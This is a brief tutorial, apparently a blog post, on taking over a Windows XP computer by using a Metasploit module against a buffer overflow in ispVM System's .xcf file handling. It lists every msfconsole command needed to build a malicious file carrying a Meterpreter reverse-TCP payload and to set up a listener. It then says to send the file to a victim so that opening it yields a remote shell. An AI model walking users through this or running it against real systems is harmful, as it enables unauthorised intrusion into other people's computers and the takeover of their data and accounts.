Hack Windows Remote PC using ispVM System XCF File Handling Overflow

This module exploits a vulnerability found in ispVM System 18.0.2. Due to the way ispVM handles. xcf files, it is possible to cause a buffer overflow with a specially crafted file, when a long value is supplied for the version attribute of the ispXCF tag. It results in arbitrary code execution under the context of the user.

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/ispvm_xcf_ispxcf

Msf exploit (ispvm_xcf_ispxcf)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ispvm_xcf_ispxcf)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ispvm_xcf_ispxcf)>exploit

After we successfully generate the malicious xcf File, it will stored on your local computer

/root/.msf4/local/msf.xcf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.4

exploit

Now send your msf.xcf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
